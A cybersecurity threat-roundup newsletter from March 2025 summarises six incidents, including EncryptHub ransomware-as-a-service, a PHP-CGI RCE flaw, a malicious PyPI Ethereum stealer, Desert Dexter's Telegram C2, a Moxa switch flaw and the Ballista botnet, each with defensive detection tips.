Cybersecurity Threats and Trends - 03/11/2025

From ransomware-as-a-service (RaaS) to persistent IoT exploitation, organizations must remain vigilant.

Author

J.W. Croley
March 11, 2025

In partnership with

Learn AI in 5 minutes a day

This is the easiest way for a busy person wanting to learn AI in as little time as possible:

  1. Sign up for The Rundown AI newsletter

  2. They send you 5-minute email updates on the latest AI news and how to use it

  3. You learn how to become 2x more productive by leveraging AI

1. EncryptHub RaaS Deploys Ransomware and Infostealers

Primary Threat: EncryptHub, a ransomware-as-a-service (RaaS) platform, is delivering multi-stage malware combining ransomware encryption and stealthy infostealers. Outpost24 threat intelligence highlights how EncryptHub’s affiliates deploy infostealers prior to encryption to exfiltrate sensitive data, targeting both corporate and government networks. The malware uses customized loaders, making detection more difficult during initial compromise.

Risk: Data exfiltration, ransomware encryption, and extortion demands.

Detection Tips:

  • Monitor for unusual data exfiltration prior to encryption events.

  • Detect execution of loader components and double extortion activity.

  • Implement network segmentation to contain lateral movement.

2. PHP-CGI RCE Flaw Exploited in Attacks Targeting Japan

Primary Threat: Attackers are actively exploiting a critical PHP-CGI remote code execution (RCE) flaw, targeting Japanese organizations. Cisco Talos reports the attacks are leveraging vulnerable PHP installations to gain persistent remote access, escalate privileges, and deploy malware on web servers.

Risk: Full system compromise, website defacement, and sensitive data theft.

Detection Tips:

  • Apply immediate patches to PHP-CGI implementations that are vulnerable.

  • Monitor for suspicious requests triggering PHP scripts with command injection.

  • Implement web application firewalls (WAF) to block malicious traffic.

3. Malicious PyPI Package Steals Ethereum Private Keys

Primary Threat: A malicious PyPI package has been discovered stealing Ethereum private keys and sensitive wallet data. Socket Security researchers reveal that the package uses obfuscated code to harvest credentials, sending the data to attacker-controlled servers. Developers integrating unverified packages are especially at risk.

Risk: Cryptocurrency theft, compromised developer environments, and potential supply chain attacks.

Detection Tips:

  • Vet all PyPI packages for suspicious behavior before installation.

  • Monitor systems for unusual outbound requests to known exfiltration endpoints.

  • Isolate developer environments handling cryptocurrency keys from internet-facing systems.

Did you know...?

The first ransomware-as-a-service (RaaS) appeared in 2016 with Cerber, offering affiliates up to 40% of ransom payments. EncryptHub represents a new generation of RaaS, combining custom infostealers and multi-stage delivery, showing how RaaS has evolved into a highly profitable criminal business model.

4. Desert Dexter Targets 900 Victims Using Telegram as C2

Primary Threat: Desert Dexter, a sophisticated cyber-espionage group, has targeted over 900 victims across Middle Eastern countries, using Telegram channels for command and control (C2). Positive Technologies reports the group is focused on government entities and energy sector organizations, employing malware capable of surveillance, keylogging, and data exfiltration.

Risk: Espionage, theft of confidential information, and national security compromise.

Detection Tips:

  • Monitor network traffic for unauthorized connections to Telegram APIs.

  • Flag processes accessing sensitive files and transmitting data to unknown endpoints.

  • Harden endpoints with behavioral detection of data exfiltration attempts.

5. Moxa Issues Fix for Vulnerability in Industrial Switches

Primary Threat: Moxa has released a fix for a critical authorization logic flaw (CVE-2024-12297) in its PT Series Ethernet switches, which could allow unauthenticated attackers to access system functions and modify configurations. Moxa’s advisory warns this could impact critical infrastructure reliant on these devices.

Risk: Industrial network compromise, configuration tampering, and operational downtime.

Detection Tips:

  • Apply firmware updates released by Moxa to mitigate CVE-2024-12297.

  • Monitor for unauthorized access attempts to industrial control systems.

  • Segregate critical operational technology (OT) networks from IT networks.

6. Ballista Botnet Exploits TP-Link Devices for DDoS Attacks

Primary Threat: The Ballista Botnet is leveraging unpatched TP-Link devices to orchestrate large-scale DDoS attacks, according to W/Labs. Ballista uses automated exploitation of outdated firmware, infecting devices with a wormable module that expands its reach across networks.

Risk: Botnet-driven DDoS, device hijacking, and infrastructure disruption.

Detection Tips:

  • Patch TP-Link devices to the latest firmware versions immediately.

  • Monitor unusual outbound traffic from IoT devices.

  • Restrict device management interfaces from external access.

IN SUMMARY:

Today’s threats include ransomware-as-a-service platforms, cryptocurrency-focused malware, and vulnerabilities in critical infrastructure. Organizations must prioritize patching, secure software development practices, and network segmentation.

🚨 Key Takeaways:
✔️ EncryptHub RaaS combines ransomware with infostealers for double extortion.
✔️ PHP-CGI flaw enables persistent remote code execution, primarily in Japan.
✔️ Malicious PyPI package steals Ethereum private keys, targeting developers.
✔️ Desert Dexter cyber-espionage leverages Telegram C2 for stealth operations.
✔️ Moxa’s critical flaw in PT switches could expose industrial networks to attack.
✔️ Ballista Botnet expands via unpatched TP-Link devices for large-scale DDoS campaigns.

🔎 Immediate Actions:
✔️ Patch PHP-CGI, Moxa PT Switches, and TP-Link devices immediately.
✔️ Vet open-source dependencies, particularly for PyPI and Go packages.
✔️ Harden cloud, OT, and IT infrastructure to prevent ransomware and botnet exploitation.
✔️ Monitor for C2 traffic, including Telegram-based channels and backconnect malware.


💡 Stay secure, stay patched, and remember: assume breach, defend in depth! 🚀

J.W.
(P.S. Check out our partners! It goes a long way to support this newsletter!)